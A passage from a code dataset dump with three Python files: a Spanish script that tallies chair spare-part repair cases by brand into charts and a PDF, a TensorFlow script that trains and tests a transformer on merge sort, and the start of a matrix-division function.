str(final.estrella))\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'Kit de ruedas: ' + str(final.rueda))\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'Brazos: ' + str(final.brazo))\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'Pistón: ' + str(final.piston))\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'Estrellas: ' + str(final.basculante))\n ejeY = ejeY - 25\n pdf.drawImage(final.nombre+'.png', ejeX+220, ejeY-55, 250, 250, preserveAspectRatio=True, mask='auto')\n ejeY = ejeY - 50\n\n pdf.drawString(ejeX, ejeY, 'Sobre un total de: ' + str(\n dataAverias.size) + '. Se podría haber solucionado con el envío de repuestos')\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'un total de: ' + str(sillasSalvables) + ' casos')\n ejeY = ejeY - 25\n porcentaje = (sillasSalvables / dataAverias.size) * 100\n porcentaje = round(porcentaje, 2)\n pdf.drawString(ejeX, ejeY, 'Lo que hace un porcentaje de: ' + str(porcentaje) + '%')\n pdf.save()\n\n\ndef crearGraficas(allSillas: list):\n for final in allSillas:\n if not (final.piston == 0 and final.estrella == 0 and\n final.rueda == 0 and final.brazo == 0 and\n final.basculante == 0):\n fig, ax = plt.subplots()\n ax.set_title('Piezas ' + final.nombre)\n ax.bar(['Estrellas', 'Ruedas', 'Brazos', 'Pistón', 'Basculante'],\n [final.estrella, final.rueda, final.brazo, final.piston, final.basculante])\n plt.savefig(final.nombre + '.png', dpi=fig.dpi)\n\n\ndef main():\n # Palabras que nos servirán para identificar la pieza que necesitamos para reponer\n palabrasClave = ['estrella', 'patas', 'base', 'soporte', 'rueda', 'brazo', 'piston', 'basculante', 'no sube',\n 'tubo de metal', 'baja sola', 'no sube', 'bloqueado']\n\n nombresComparar = ['Newskill', 'Corsair', 'Drift', 'Razer', 'Noblechair', 'MSI', 'Tempest', 'Sharkoon', 'Asus',\n 'Nacon', 'Woxter', 'Playseat', 'Forgeon', 'Aerocool', 'Equip', 'Genesis', 'HP', 'Next Level',\n 'NGS', 'Oplite', 'Owlotech', 'Thermaltake', 'Trust', 'ZEN']\n\n directorio = \"C:/Users/RMA-BANCADA-7/Documents/RMAS de Sillas desde 01_01_2022.xls\"\n # Se obtiene datos\n dataMarcas = obtenerdatoscolumna(directorio, 'productName')\n dataAverias = obtenerdatoscolumna(directorio, 'info')\n # Se crean todos los objetos\n allSillas = crearobjetos(nombresComparar)\n sillasSalvables: int = 0\n # Se itera sobre averias\n for i in range(dataAverias.size):\n # Se obtiene la marca actual que estamos comprobando\n actualMarca: str = encontrarMarca(dataMarcas[i], nombresComparar)\n # Se comprueba que marca existe\n if actualMarca:\n # Traemos el objeto silla que se va a utilizar\n actualSilla: Silla = encontrarSilla(actualMarca, allSillas)\n\n repuesto: str = esReparable(dataAverias[i], palabrasClave)\n if repuesto:\n sillasSalvables = sillasSalvables + 1\n if repuesto == 'estrella' or repuesto == 'patas' or repuesto == 'soporte':\n actualSilla.estrella = actualSilla.estrella + 1\n if repuesto == 'rueda':\n actualSilla.rueda = actualSilla.rueda + 1\n if repuesto == 'brazo':\n actualSilla.brazo = actualSilla.brazo + 1\n if repuesto == 'piston' or repuesto == 'tubo' or repuesto == 'no sube' or repuesto == 'tubo de metal' \\\n or repuesto == 'baja sola' or repuesto == 'no sube' or repuesto == 'bloqueado':\n actualSilla.piston = actualSilla.piston + 1\n if repuesto == 'basculante':\n actualSilla.basculante = actualSilla.basculante + 1\n\n crearGraficas(allSillas)\n crearPdf(allSillas, dataAverias, sillasSalvables)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Lorca94/RepuestosSillas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1649583632","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nimport time\nimport matplotlib.pyplot as plt\nimport sys\nimport numpy as np\nsys.path.append('../data/')\nsys.path.append('../model/')\nsys.path.append('../')\nfrom merge_data import *\nfrom model import *\nfrom utils import *\n\ndef run_merge(current_dir, reload_from_dir, reload_dir, checkpoint_path_data, checkpoint_path_msk):\n binary_size = 8\n d_model = 16\n\n seq_len_1 = 8\n seq_len = seq_len_1*2\n\n Train_SIZE = 5000 \n Train_small_size = 500\n BATCH_SIZE = 64\n Val_size = 500\n Val_small_size = 50\n num_filters = 16\n filter_size = 3\n\n\n num_max = 2**binary_size\n end_token = 2 ** binary_size\n pad_token = 2 ** binary_size + 1\n\n state_size = seq_len+1\n num_layers = 6\n dff = 128\n\n target_vocab_size = binary_size + 1\n dropout_rate = 0.1\n \n if reload_from_dir:\n EPOCHS = 1\n else:\n EPOCHS = 100\n res_ratio = 1.5\n\n out_num = True\n out_pos = True\n assert(out_num or out_pos)\n pos_enc = 3\n\n discount = 0.005\n make_sym = True\n USE_positioning = False\n with open(\"{}parameters.txt\".format(current_dir), 'w') as fi:\n fi.write(\"binary_size: {}\\nd_model: {}\\nseq_len_1: {}\\nseq_len: {}\\nTrain_SIZE: {}\\nTrain_small_size: {}\\nBATCH_SIZE: {}\\nVal_size: {}\\nVal_small_size: {}\\nnum_filters: {}\\nfilter_size: {}\\nnum_max: {}\\nnum_layers: {}\\ndff: {}\\ntarget_vocab_size: {}\\ndropout_rate: {}\\nmake_sym: {}\\nEPOCHS: {}\\nres_ratio: {}\\nout_num: {}\\nout_pos: {}\\nUSE_positioning: {}\\npos_enc: {}\\ndiscount: {}\".format(binary_size, d_model, seq_len_1, seq_len, Train_SIZE, Train_small_size, BATCH_SIZE, Val_size, Val_small_size, num_filters, filter_size, num_max, num_layers, dff, target_vocab_size, dropout_rate, make_sym, EPOCHS, res_ratio, out_num, out_pos, USE_positioning, pos_enc, discount) + reload_from_dir * \"\\nreload_dir: {}\".format(reload_dir))\n \n Train_dataset, Val_dataset, Texmp_size = merge_data_gen(current_dir, reload_from_dir, reload_dir, num_max, Train_SIZE, Train_small_size, Val_size, Val_small_size, state_size, seq_len_1, seq_len)\n def encode(tr, mask, srt, pos_list):\n seq_l = np.int64(np.floor(len(tr)/2))\n tr = np.hstack((tr[:seq_l], end_token, tr[seq_l:], end_token))\n srt = np.hstack((srt, end_token))\n pos_list = np.hstack((pos_list, seq_l))\n return tr, mask, srt, pos_list\n \n def tf_encode(tr, mask, srt, pos_list):\n return tf.py_function(encode, [tr, mask, srt, pos_list], [tf.int64, tf.int64, tf.int64, tf.int64])\n\n def encode_wo_mask(tr, srt):\n seq_l = np.int64(np.floor(len(tr)/2))\n tr = np.hstack((tr[:seq_l], end_token, tr[seq_l:], end_token))\n srt = np.hstack((srt, end_token))\n return tr, srt\n\n def tf_encode_wo_mask(tr, srt):\n return tf.py_function(encode_wo_mask,[tr, srt], [tf.int64, tf.int64])\n\n train_dataset = Train_dataset.map(tf_encode)\n train_dataset = train_dataset.cache()\n train_dataset = train_dataset.shuffle(Texmp_size).batch(BATCH_SIZE)\n train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\n exmp = next(iter(train_dataset))\n print(exmp[0][0,:])\n print(exmp[1][0,:,:])\n print(exmp[2][0,:])\n print(exmp[3][0,:])\n\n val_dataset = Val_dataset.map(tf_encode)\n val_dataset = val_dataset.batch(BATCH_SIZE)\n\n exmp = next(iter(val_dataset))\n print(exmp[0][0,:])\n print(exmp[1][0,:,:])\n print(exmp[2][0,:])\n print(exmp[3][0,:])\n \n transformer = Transformer(num_layers, d_model, binary_size+1, dff, pos_enc, target_vocab_size, make_sym, USE_positioning, out_num, out_pos, res_ratio, dropout_rate)\n msk_transform = mask_transform(num_filters, filter_size, dropout_rate)\n \n learning_rate_data = CustomSchedule(d_model)\n learning_rate_msk = CustomSchedule(num_filters)\n\n optimizer_data = tf.keras.optimizers.Adam(learning_rate_data, beta_1=0.9, beta_2=0.98, \n epsilon=1e-9)\n\n optimizer_msk = tf.keras.optimizers.Adam(learning_rate_msk, beta_1=0.9, beta_2=0.98, \n epsilon=1e-9)\n \n ckpt_data = tf.train.Checkpoint(transformer=transformer,\n optimizer_data=optimizer_data)\n ckpt_msk = tf.train.Checkpoint(msk_transform=msk_transform,\n optimizer_msk=optimizer_msk)\n\n\n ckpt_manager_data = tf.train.CheckpointManager(ckpt_data, checkpoint_path_data, max_to_keep=5)\n ckpt_manager_msk = tf.train.CheckpointManager(ckpt_msk, checkpoint_path_msk, max_to_keep=5)\n # if a checkpoint exists, restore the latest checkpoint.\n if ckpt_manager_data.latest_checkpoint:\n ckpt_data.restore(ckpt_manager_data.latest_checkpoint)\n print ('Model_data checkpoint restored!!')\n\n if ckpt_manager_msk.latest_checkpoint:\n ckpt_msk.restore(ckpt_manager_msk.latest_checkpoint)\n print ('Model_msk checkpoint restored!!')\n \n train_data_loss = tf.keras.metrics.Mean(name='train_data_loss')\n train_data_content_loss = tf.keras.metrics.Mean(name='train_data_content_loss')\n train_data_pos_loss = tf.keras.metrics.Mean(name='train_data_pos_loss')\n train_msk_loss = tf.keras.metrics.Mean(name='train_msk_loss')\n train_data_accuracy = tf.keras.metrics.Accuracy(name='train_data_accuracy')\n train_msk_accuracy = tf.keras.metrics.Accuracy(name='train_msk_accuracy')\n d_loss = tf.keras.metrics.Mean(name='d_loss')\n d_accuracy = tf.keras.metrics.Accuracy(name='d_accuracy')\n \n def create_masks(mask, seq_1, seq_2):\n mask_first = mask[:,:,0]\n mask_second = mask[:,:,1]\n batch_size = mask.shape[0]\n state_size = mask.shape[1]\n emb_1 = tf.one_hot(mask_first, seq_1+1, axis=-1)\n emb_2 = tf.one_hot(mask_second, seq_2+1, axis=-1)\n enc_padding_mask = tf.concat([emb_1, emb_2], -1)\n \n combined_mask = None\n enc_padding_mask = 1-enc_padding_mask\n enc_padding_mask = enc_padding_mask[:,:,tf.newaxis,:]\n dec_padding_mask = enc_padding_mask\n return enc_padding_mask, combined_mask, dec_padding_mask\n \n summary_writer = tf.summary.create_file_writer(current_dir + 'logs')\n @tf.function\n def train_step_data(inp, mask, tar, pos, seq_1, seq_2):\n batch_size = mask.shape[0]\n state_size = mask.shape[-2]\n enc_inp = tf.tile(inp[:, tf.newaxis, :], [1, state_size, 1])\n dec_inp = tf.zeros((batch_size, state_size, 1), dtype=tf.int64)\n enc_padding_mask, combined_mask, dec_padding_mask = create_masks(mask, seq_1, seq_2)\n chg_mask = tf.one_hot(pos, seq_1+seq_2+2)\n with tf.GradientTape() as tape:\n predictions,_,predicted_pos = transformer(enc_inp, dec_inp, True, enc_padding_mask, combined_mask, dec_padding_mask)\n predictions = tf.squeeze(predictions, -2)\n weights = tf.concat([tf.ones((tar.shape[0], seq_1+seq_2)), tf.ones((tar.shape[0], 1))*discount],-1)\n loss_content = loss_function(binary_encoding(tar, binary_size+1), predictions, weights)\n loss_position = loss_pos(chg_mask, predicted_pos, weights)\n loss = loss_content + loss_position\n gradients = tape.gradient(loss, transformer.trainable_variables)\n optimizer_data.apply_gradients(zip(gradients, transformer.trainable_variables))\n train_data_loss(loss)\n train_data_content_loss(loss_content)\n train_data_pos_loss(loss_position) \n tf.summary.scalar(\"data_loss\", train_data_loss.result(), step=optimizer_data.iterations)\n tf.summary.scalar(\"data_content_loss\", train_data_content_loss.result(), step=optimizer_data.iterations)\n tf.summary.scalar(\"data_pos_loss\", train_data_pos_loss.result(), step=optimizer_data.iterations)\n pred_binary = tf.cast(tf.greater(predictions, 0), tf.int64)\n pred_binary = back2int(pred_binary)\n train_data_accuracy(tar, pred_binary)\n return tf.transpose(enc_padding_mask,[0,1,3,2]), chg_mask[:,:,:,tf.newaxis] \n \n @tf.function\n def train_step_msk(init_msk, chg_msk):\n x = tf.concat([init_msk, chg_msk], axis=-1)\n ######## exclude the last one ###############\n x = x[:,:-1,:,:]\n tar_msk = init_msk[:,1:,:,0]\n x = tf.reshape(x,[-1, x.shape[-2], x.shape[-1]])\n x = 2*x-1\n with tf.GradientTape() as tape:\n predict_msk = msk_transform(x, True) #### batch_size*seq_len, seq_len\n predict_msk = tf.reshape(predict_msk, (tar_msk.shape[0], tar_msk.shape[-2], tar_msk.shape[-1]))\n loss_msk = loss_function(tar_msk, predict_msk)\n gradients = tape.gradient(loss_msk, msk_transform.trainable_variables)\n optimizer_msk.apply_gradients(zip(gradients, msk_transform.trainable_variables))\n train_msk_loss(loss_msk)\n tf.summary.scalar(\"msk_loss\", train_msk_loss.result(), step=optimizer_msk.iterations)\n predict_msk_binary = tf.cast(tf.greater(predict_msk, 0), tf.float32)\n err = tf.reduce_sum(tar_msk-predict_msk_binary, axis=-1)\n train_msk_accuracy(err, tf.zeros_like(err))\n \n \n def eval_val(state_size, dataset, seq_1, seq_2, name='Validation', include_pos_loss=True):\n d_loss.reset_states()\n d_accuracy.reset_states()\n for element in dataset:\n if include_pos_loss:\n inp, mask, tar, _ = element\n msk_tar, _, _ = create_masks(mask, seq_1, seq_2)\n else:\n inp, tar = element\n enc_inp = inp[:, tf.newaxis, :]\n batch_size = enc_inp.shape[0]\n dec_inp = tf.zeros((batch_size, 1, 1), dtype=tf.int64)\n \n enc_padding_mask = tf.concat([tf.ones((batch_size, 1, 1)), tf.zeros((batch_size, 1, seq_1)), tf.ones((batch_size, 1, 1)), tf.zeros((batch_size, 1, seq_2))], -1)\n enc_padding_mask = 1-enc_padding_mask[:,:,tf.newaxis,:]\n dec_padding_mask = enc_padding_mask\n combined_mask = None\n \n if include_pos_loss:\n mask_list = []\n out_list = []\n for i in range(state_size):\n predictions,_,predicted_pos = transformer(enc_inp, dec_inp, False, enc_padding_mask, combined_mask, dec_padding_mask)\n out_list.append(tf.squeeze(predictions, -2))\n ########### replace argmax (uncertain) ############\n predicted_pos_max = tf.reduce_max(predicted_pos, axis=-1, keepdims=True)\n predicted_pos_max = tf.equal(predicted_pos, predicted_pos_max)\n predicted_pos_ind = tf.reshape(predicted_pos_max, [-1, predicted_pos_max.shape[-1]])\n predicted_pos_ind = tf.where(predicted_pos_ind)\n pos_id = tf.cast(tf.math.segment_min(predicted_pos_ind[:,1],predicted_pos_ind[:,0]), tf.int64)\n pos_id = tf.reshape(pos_id, [predicted_pos_max.shape[0], predicted_pos_max.shape[1]])\n \n chg_msk = tf.one_hot(pos_id, seq_1+seq_2+2)[:,:,:,tf.newaxis]\n init_msk = tf.transpose(enc_padding_mask,[0,1,3,2])\n x = tf.concat([init_msk,chg_msk],axis=-1)\n x = tf.reshape(x,[-1, x.shape[-2], x.shape[-1]])\n x = 2*x-1\n predict_msk = msk_transform(x, False)\n if include_pos_loss:\n mask_list.append(predict_msk[:,tf.newaxis,:])\n predict_msk = tf.cast(tf.greater(predict_msk, 0), tf.float32)\n enc_padding_mask = predict_msk[:, tf.newaxis, tf.newaxis, :]\n dec_padding_mask = enc_padding_mask\n if include_pos_loss:\n mask_est = tf.concat(mask_list[:-1], -2)\n loss_position = loss_function(msk_tar[:,1:,0,:], mask_est)\n else:\n loss_position = 0\n out_est = tf.concat(out_list, -2)\n loss_content = loss_function(binary_encoding(tar, binary_size+1), out_est)\n loss = loss_position + loss_content\n d_loss(loss)\n \n out_binary = tf.cast(tf.greater(out_est, 0), tf.int64)\n out_binary = back2int(out_binary)\n # if not tf.equal(tf.reduce_sum(tar-out_binary),0):\n # print(\"inp\")\n # print(inp)\n # print(\"tar\")\n # print(tar)\n # print(\"pre_out\")\n # print(out_binary)\n d_accuracy(tar, out_binary)\n print('{}_Loss {:.4f} {}_Accuracy {:.4f}'.format(name, d_loss.result(), name, d_accuracy.result()))\n return d_accuracy.result()\n \n for epoch in range(EPOCHS):\n start = time.time()\n train_data_loss.reset_states()\n train_data_content_loss.reset_states()\n train_data_pos_loss.reset_states()\n train_msk_loss.reset_states()\n train_data_accuracy.reset_states()\n train_msk_accuracy.reset_states()\n with summary_writer.as_default():\n for (batch, (inp, mask, tar, pos)) in enumerate(train_dataset):\n init_msk, chg_msk = train_step_data(inp, mask, tar, pos, seq_len_1, seq_len_1)\n train_step_msk(init_msk, chg_msk)\n if batch % 500 == 0:\n print('Epoch {} Batch {}:\\nTraining_Data_Loss {:.4f} Training_Data_Accuracy {:.4f}\\nTraining_Msk_Loss {:.4f} Training_Msk_Accuracy {:.4f}'.format(epoch+1, batch, train_data_loss.result(), train_data_accuracy.result(), train_msk_loss.result(), train_msk_accuracy.result()))\n eval_val(state_size, val_dataset, seq_len_1, seq_len_1)\n if (epoch + 1) % 5 == 0:\n ckpt_save_path_data = ckpt_manager_data.save()\n ckpt_save_path_msk = ckpt_manager_msk.save()\n print(\"Saving checkpoint for epoch {} at {} and {}\".format(epoch + 1, ckpt_save_path_data, ckpt_save_path_msk))\n print('Epoch {} Batch {}:\\nTraining_Data_Loss {:.4f} Training_Data_Accuracy {:.4f}\\nTraining_Msk_Loss {:.4f} Training_Msk_Accuracy {:.4f}'.format(epoch+1, batch, train_data_loss.result(), train_data_accuracy.result(), train_msk_loss.result(), train_msk_accuracy.result()))\n eval_val(state_size, val_dataset, seq_len_1, seq_len_1)\n print('Time taken for 1 epoch: {} secs\\n'.format(time.time()-start))\n \n \n max_seq_len = 100\n max_seq_step = 60\n test_size_random = 60\n test_size_small_steps = 10\n acc = []\n for i in range(9, max_seq_len+1):\n test_random = np.random.choice(range(num_max), (test_size_random, i))\n test_special = []\n if tf.less_equal(i, max_seq_step):\n for step in range(1,5):\n start_tst = np.random.choice(range(num_max-(i-1)*step), (test_size_small_steps, 1), replace=False)\n test = np.tile(start_tst, [1, i])\n test += np.arange(0, i*step, step)\n test_special.append(test)\n else:\n for step in range(1,5):\n start_tst = np.random.choice(range(num_max-(max_seq_step-1)*step), (test_size_small_steps, 1), replace=False)\n test = np.tile(start_tst, [1, max_seq_step])\n test += np.arange(0, max_seq_step*step, step)\n padded_random = np.random.choice(range(num_max), (test_size_small_steps, i-max_seq_step))\n test = np.concatenate((test, padded_random), axis=-1)\n test_special.append(test)\n test_special = np.concatenate(test_special, axis=0)\n np.apply_along_axis(np.random.shuffle, 1, test_special)\n test = np.concatenate([test_random, test_special], axis=0)\n \n test_out = np.zeros_like(test, dtype='int64')\n for j, seq in enumerate(test):\n out_seq, _, _ = join(seq)\n test_out[j,:] = out_seq\n \n test_dataset = tf.data.Dataset.from_tensor_slices((test, test_out))\n test_dataset = test_dataset.map(tf_encode_wo_mask)\n test_dataset = test_dataset.batch(BATCH_SIZE)\n seq_1 = np.int64(np.floor(i/2))\n seq_2 = i-seq_1\n acc.append(eval_val(i+1, test_dataset, seq_1, seq_2, name=\"Test_seq{}\".format(i), include_pos_loss=False)) \n \n \n plt.figure()\n plt.plot(range(9, 9+len(acc)), acc)\n plt.xlabel('seq_len')\n plt.ylabel('merge_func_acc')\n filename = \"merge_func_acc_plot.png\"\n plt.savefig(current_dir+filename)\n \n \n def evaluate(inp_sentence, seq_1):\n seq_2 = inp_sentence.shape[-1]-seq_1\n \n inp_sentence = np.hstack((inp_sentence[:seq_1], end_token, inp_sentence[seq_1:], end_token))\n inp_sentence = inp_sentence.astype('int64')\n inp_sentence = tf.convert_to_tensor(inp_sentence)\n \n enc_inp = inp_sentence[tf.newaxis, tf.newaxis, :]\n dec_inp = tf.zeros((1,1,1), dtype=tf.int64)\n enc_padding_mask = tf.concat([tf.ones((1,1,1)), tf.zeros((1, 1, seq_1)), tf.ones((1,1,1)), tf.zeros((1,1,seq_2))],-1)\n enc_padding_mask = 1-enc_padding_mask[:,:,tf.newaxis,:]\n dec_padding_mask = enc_padding_mask\n combined_mask = None\n \n out_list = []\n attention_weights = []\n for i in range(seq_1+seq_2+1): ###### predicted_pos: (1,1,seq_1+seq_2+2)\n predictions, _, predicted_pos = transformer(enc_inp, dec_inp, False, enc_padding_mask, combined_mask, dec_padding_mask)\n attention_weights.append(tf.squeeze(predicted_pos,0)) # (1,seq_1+seq_2+2)\n ############### replace argmax ################################\n out_list.append(tf.squeeze(predictions))\n predicted_pos = tf.squeeze(predicted_pos, 1)\n att_max = tf.reduce_max(predicted_pos, axis=-1, keepdims=True)\n att_max_ind = tf.where(tf.equal(predicted_pos, att_max))\n pos_id = tf.cast(tf.math.segment_min(att_max_ind[:,1],att_max_ind[:,0]), tf.int64)\n pos_id = pos_id[:,tf.newaxis]\n chg_msk = tf.one_hot(pos_id, seq_1+seq_2+2)[:,:,:,tf.newaxis]\n init_msk = tf.transpose(enc_padding_mask,[0,1,3,2])\n x = tf.concat([init_msk,chg_msk],axis=-1)\n x = tf.reshape(x,[-1, x.shape[-2], x.shape[-1]])\n x = 2*x-1\n predict_msk = msk_transform(x, False)\n predict_msk = tf.cast(tf.greater(predict_msk, 0), tf.float32)\n enc_padding_mask = predict_msk[:, tf.newaxis, tf.newaxis, :]\n dec_padding_mask = enc_padding_mask\n \n out_est = tf.stack(out_list, axis=0)\n out_binary = tf.cast(tf.greater(out_est, 0), tf.int64)\n out_binary = back2int(out_binary) \n return out_binary, tf.concat(attention_weights, -2)\n \n seq_1 = 2\n seq_2 = 2\n random_num = np.random.choice(range(num_max), (seq_1+seq_2))\n print(\"random num test:\")\n print(\"original_sequence: {}\".format(random_num))\n output, _ = evaluate(random_num, seq_1)\n print(\"predicted_sequence: {}\".format(output))\n \n \n def merge_sort(dataset, name='Test'):\n d_loss.reset_states()\n d_accuracy.reset_states()\n for (batch, (inp, tar)) in enumerate(dataset):\n batch_size = inp.shape[0]\n seq_len = inp.shape[-1]\n L = tf.cast(tf.math.ceil(tf.math.log(tf.cast(seq_len, tf.float32))/tf.math.log(2.0)), tf.int64)\n pad_num = tf.pow(2,L)-seq_len\n inp_new = tf.concat([inp[:,:,tf.newaxis], tf.ones([batch_size, seq_len, 1], dtype=tf.int64)*end_token], -1)\n inp_new = tf.concat([inp_new, pad_token*tf.ones([batch_size, pad_num, 2], dtype=tf.int64)], -2)\n for i in range(1, L+1):\n j = tf.pow(2,i)\n inp_res = tf.reshape(inp_new, [-1, j+2])\n batch_size_new = inp_res.shape[0]\n \n enc_inp = inp_res[:, tf.newaxis,:]\n dec_inp = tf.zeros((batch_size_new, 1, 1), dtype=tf.int64)\n \n seq_1 = tf.pow(2,i-1)\n seq_2 = seq_1\n enc_mask = create_padding_mask(inp_res)\n enc_padding_mask = tf.concat([tf.ones((batch_size_new, 1, 1)), tf.zeros((batch_size_new, 1, seq_1)), tf.ones((batch_size_new, 1, 1)), tf.zeros((batch_size_new, 1, seq_2))], -1)\n enc_padding_mask = 1-enc_padding_mask[:,:,tf.newaxis,:]\n enc_padding_mask = tf.maximum(enc_mask, enc_padding_mask)\n \n dec_padding_mask = enc_padding_mask\n combined_mask = None\n \n out_list =[]\n for _ in range(j+1):\n predictions, _, predicted_pos = transformer(enc_inp, dec_inp, False, enc_padding_mask, combined_mask, dec_padding_mask)\n out_list.append(tf.squeeze(predictions, -2))\n ########## compute argmax #################\n predicted_pos_max = tf.reduce_max(predicted_pos, axis=-1, keepdims=True)\n predicted_pos_max = tf.equal(predicted_pos, predicted_pos_max)\n predicted_pos_ind = tf.reshape(predicted_pos_max, [-1, predicted_pos_max.shape[-1]])\n predicted_pos_ind = tf.where(predicted_pos_ind)\n pos_id = tf.cast(tf.math.segment_min(predicted_pos_ind[:,1],predicted_pos_ind[:,0]), tf.int64)\n pos_id = tf.reshape(pos_id, [predicted_pos_max.shape[0], predicted_pos_max.shape[1]])\n ############################################\n chg_msk = tf.one_hot(pos_id, seq_1+seq_2+2)[:,:,:,tf.newaxis]\n init_msk = tf.transpose(enc_padding_mask,[0,1,3,2])\n x = tf.concat([init_msk,chg_msk],axis=-1)\n x = tf.reshape(x,[-1, x.shape[-2], x.shape[-1]])\n x = 2*x-1\n predict_msk = msk_transform(x, False)\n predict_msk = tf.cast(tf.greater(predict_msk, 0), tf.float32)\n enc_padding_mask = predict_msk[:, tf.newaxis, tf.newaxis, :]\n dec_padding_mask = enc_padding_mask\n inp_new = tf.concat(out_list, -2)\n inp_new = tf.cast(tf.greater(inp_new, 0), tf.int64)\n inp_new = back2int(inp_new) \n if tf.equal(i, L):\n d_accuracy(tar, inp_new[:,:seq_len+1])\n print('{}_Accuracy {:.4f}'.format(name, d_accuracy.result()))\n return d_accuracy.result()\n\n def encode_sort(tr, srt):\n srt = np.hstack((srt, end_token))\n return tr, srt\n\n def tf_encode_sort(tr, srt):\n return tf.py_function(encode_sort, [tr, srt], [tf.int64, tf.int64])\n\n max_seq_len = 100\n max_seq_step = 60\n test_size_random = 60\n test_size_small_steps = 10\n acc = []\n for i in range(2, max_seq_len+1):\n test_random = np.random.choice(range(num_max), (test_size_random, i))\n test_special = []\n if tf.less_equal(i, max_seq_step):\n for step in range(1,5):\n start_tst = np.random.choice(range(num_max-(i-1)*step), (test_size_small_steps, 1), replace=False)\n test = np.tile(start_tst, [1, i])\n test += np.arange(0, i*step, step)\n test_special.append(test)\n else:\n for step in range(1,5):\n start_tst = np.random.choice(range(num_max-(max_seq_step-1)*step), (test_size_small_steps, 1), replace=False)\n test = np.tile(start_tst, [1, max_seq_step])\n test += np.arange(0, max_seq_step*step, step)\n padded_random = np.random.choice(range(num_max), (test_size_small_steps, i-max_seq_step))\n test = np.concatenate((test, padded_random), axis=-1)\n test_special.append(test)\n test_special = np.concatenate(test_special, axis=0)\n np.apply_along_axis(np.random.shuffle, 1, test_special)\n test = np.concatenate([test_random, test_special], axis=0)\n \n Sorted_test = np.sort(test)\n test_dataset = tf.data.Dataset.from_tensor_slices((test, Sorted_test))\n test_dataset = test_dataset.map(tf_encode_sort)\n test_dataset = test_dataset.batch(BATCH_SIZE)\n acc.append(merge_sort(test_dataset, name=\"Test_seq{}\".format(i))) \n \n\n\n # In[ ]:\n\n\n def merge_sort_test_exmp(inp):\n print(\"Original sequence:\")\n print(inp)\n print(\"Target sequence:\")\n print(np.sort(inp))\n seq_len = inp.shape[-1]\n L = tf.cast(tf.math.ceil(tf.math.log(tf.cast(seq_len, tf.float32))/tf.math.log(2.0)), tf.int64)\n pad_num = tf.pow(2,L)-seq_len\n inp_new = tf.concat([inp[tf.newaxis,:,tf.newaxis], tf.ones([1, seq_len, 1], dtype=tf.int64)*end_token], -1)\n inp_new = tf.concat([inp_new, pad_token*tf.ones([inp_new.shape[0], pad_num, 2], dtype=tf.int64)], -2)\n for i in range(1, L+1):\n print(\"step {}:\".format(i))\n j = tf.pow(2,i)\n inp_res = tf.reshape(inp_new, [-1, j+2])\n batch_size_new = inp_res.shape[0]\n \n enc_inp = inp_res[:, tf.newaxis,:]\n dec_inp = tf.zeros((batch_size_new, 1, 1), dtype=tf.int64)\n\n seq_1 = tf.pow(2,i-1)\n seq_2 = seq_1\n enc_mask = create_padding_mask(inp_res)\n enc_padding_mask = tf.concat([tf.ones((batch_size_new, 1, 1)), tf.zeros((batch_size_new, 1, seq_1)), tf.ones((batch_size_new, 1, 1)), tf.zeros((batch_size_new, 1, seq_2))], -1)\n enc_padding_mask = 1-enc_padding_mask[:,:,tf.newaxis,:]\n enc_padding_mask = tf.maximum(enc_mask, enc_padding_mask)\n \n dec_padding_mask = enc_padding_mask\n combined_mask = None\n \n out_list =[]\n for _ in range(j+1):\n predictions, _, predicted_pos = transformer(enc_inp, dec_inp, False, enc_padding_mask, combined_mask, dec_padding_mask)\n out_list.append(tf.squeeze(predictions, -2))\n ########## compute argmax #################\n predicted_pos_max = tf.reduce_max(predicted_pos, axis=-1, keepdims=True)\n predicted_pos_max = tf.equal(predicted_pos, predicted_pos_max)\n predicted_pos_ind = tf.reshape(predicted_pos_max, [-1, predicted_pos_max.shape[-1]])\n predicted_pos_ind = tf.where(predicted_pos_ind)\n pos_id = tf.cast(tf.math.segment_min(predicted_pos_ind[:,1],predicted_pos_ind[:,0]), tf.int64)\n pos_id = tf.reshape(pos_id, [predicted_pos_max.shape[0], predicted_pos_max.shape[1]])\n ############################################\n chg_msk = tf.one_hot(pos_id, seq_1+seq_2+2)[:,:,:,tf.newaxis]\n init_msk = tf.transpose(enc_padding_mask,[0,1,3,2])\n x = tf.concat([init_msk,chg_msk],axis=-1)\n x = tf.reshape(x,[-1, x.shape[-2], x.shape[-1]])\n x = 2*x-1\n predict_msk = msk_transform(x, False)\n predict_msk = tf.cast(tf.greater(predict_msk, 0), tf.float32)\n enc_padding_mask = predict_msk[:, tf.newaxis, tf.newaxis, :]\n dec_padding_mask = enc_padding_mask\n inp_new = tf.concat(out_list, -2)\n inp_new = tf.cast(tf.greater(inp_new, 0), tf.int64)\n inp_new = back2int(inp_new)\n inp_new_re = tf.reshape(inp_new, (-1,))\n print(tf.squeeze(tf.gather(inp_new_re, tf.where(tf.not_equal(inp_new_re, end_token))))[:seq_len])\n\n\n # In[ ]:\n\n\n test_length = 100\n step = 2\n random_num = np.random.choice(range(num_max), (test_length,))\n print(\"random num test:\")\n merge_sort_test_exmp(random_num)\n start_tst = np.random.choice(range(num_max-(test_length-1)*step))\n test = np.tile(start_tst, [test_length])\n test += np.arange(0, test_length*step, step)\n np.apply_along_axis(np.random.shuffle, 0, test)\n print(\"granularity test (step: {}):\".format(step))\n merge_sort_test_exmp(test)\n ","repo_name":"Yujun-Yan/Neural-Execution-Engines","sub_path":"run_exp/run_merge_sort.py","file_name":"run_merge_sort.py","file_ext":"py","file_size_in_byte":28029,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"21457761951","text":"#!/usr/bin/python3\n\"\"\" module with a function that divides all elements of a matrix \"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\"function that divides all elements of a matrix\"\"\"\n if (not isinstance(matrix, list) or matrix == []\n or not all(isinstance(row, list) for row in matrix)):\n raise TypeError(\"matrix must be a matrix (list of 